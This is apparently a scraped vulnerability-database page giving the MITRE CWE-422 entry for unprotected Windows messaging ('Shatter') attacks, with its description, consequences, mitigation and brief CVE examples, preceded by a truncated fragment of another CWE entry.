Scope: Other. Impact: Quality Degradation, Varies by Context.
Observed Examples:
CVE-2002-1976: Linux kernel 2.2 and above allow promiscuous mode using a different method than previous versions, and ifconfig is not aware of the new method (alternate path property).
CVE-2005-1711: Product uses defunct method from another product that does not return an error code and allows detection avoidance.
CVE-2003-0411: chain: Code was ported from a case-sensitive Unix platform to a case-insensitive Windows platform where
CWE
Unprotected Windows Messaging Channel ('Shatter')
mitre_cwe·CVSS 4.6
[MEDIUM] CWE-422 Unprotected Windows Messaging Channel ('Shatter')
CWE-422: Unprotected Windows Messaging Channel ('Shatter')
The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product.
Modes of Introduction:
Phase: Architecture and Design
Common Consequences:
Scope: Access Control. Impact: Gain Privileges or Assume Identity, Bypass Protection Mechanism.
Potential Mitigations:
[Architecture and Design] Always verify and authenticate the source of the message.
Observed Examples:
CVE-2002-0971: Bypass GUI and access restricted dialog box.
CVE-2002-1230: Gain privileges via Windows message.
CVE-2003-0350: A control allows a change to a pointer for a callback function using Windows mess
2002-12-31
Published